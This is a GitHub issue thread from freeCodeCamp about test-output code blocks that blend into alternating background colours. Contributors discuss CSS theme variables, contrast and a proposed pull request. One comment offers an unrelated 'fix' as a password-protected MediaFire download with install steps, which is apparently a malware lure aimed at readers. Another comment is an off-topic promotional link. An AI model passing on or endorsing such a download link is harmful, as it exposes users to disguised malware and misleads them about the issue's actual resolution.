### ISSUE TITLE
Code blocks in tests are same color as background

### ISSUE THREAD

**Issue by moT01** [freeCodeCamp/freeCodeCamp#55963]
### Describe the Issue

Some codeblocks in the tests have the same color as the background - making it more difficult to notice them.

### Affected Page

https://www.freecodecamp.org/learn/javascript-algorithms-and-data-structures-v8/build-a-cash-register-project/

### Steps to Reproduce

1. Go to https://www.freecodecamp.org/learn/javascript-algorithms-and-data-structures-v8/build-a-cash-register-project/build-a-cash-register
1. Scroll down to the tests with the alternating background colors
1. See the codeblocks in the tests with the darker background blend in

### Expected behavior

It to not blend in like that. 

### System

<img width="810" alt="Screenshot 2024-08-30 at 3 27 02 PM" src="https://github.com/user-attachments/assets/209a50dd-d376-4699-b3eb-5babbdc691cd">

^ notice on the ones with the darker background. The code blocks blend in.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by lasjorg** [comment]
The question is, do we change the list style or the code blocks?

Here it is with the odd list items, using gray-15 for the background color. It does help a bit, but the contrast isn't amazing.

![list-odd-gray-15](https://github.com/user-attachments/assets/4731d6fd-c417-44eb-8b0e-e64f00c211c6)

**Comment by Stephen-254** [comment]
It will be easier to change the backgrounds rather than the code blocks.

**Comment by manuelguijarrosanchez** [comment]
I think the same, I think it is better to change the background style, I think they are all in the commons.css file.

**Comment by lasjorg** [comment]
Right now they follow the theme styles using the `--tertiary-background` color variable. Which works for the list in both light and dark mode (except for the contrast issue with code blocks). `--quaternary-background` which is `gray-15` in light mode is `--gray-75` in dark mode and looks too bright.

If we change the background it has to work with both color schemes using common custom properties. So we may have to create a new color just for the test output lists.

`client/src/templates/Challenges/components/test-suite.css`

Has the odd list items styles just for the test list output.

---

BTW, I have noticed some really annoying behavior when testing CSS in dev. Sometimes the styles just break and won't apply new changes. I think it has always been an issue, likely some caching weirdness.

**Comment by nkalpakis21** [comment]
built an app to get paid for this PR
https://www.n0va-io.com/discover/freeCodeCamp/freeCodeCamp

**Comment by ojeytonwilliams** [comment]
Rather than having the colour alternate, we could use borders to convey the same information. Then we can use the higher contrast background everywhere.

**Comment by Sembauke** [comment]
Let's go with #56018 approach. The contrast seems high enough.

**Comment by Lalith246** [comment]
Can someone please review and move [#56018 ](https://github.com/freeCodeCamp/freeCodeCamp/pull/56018)
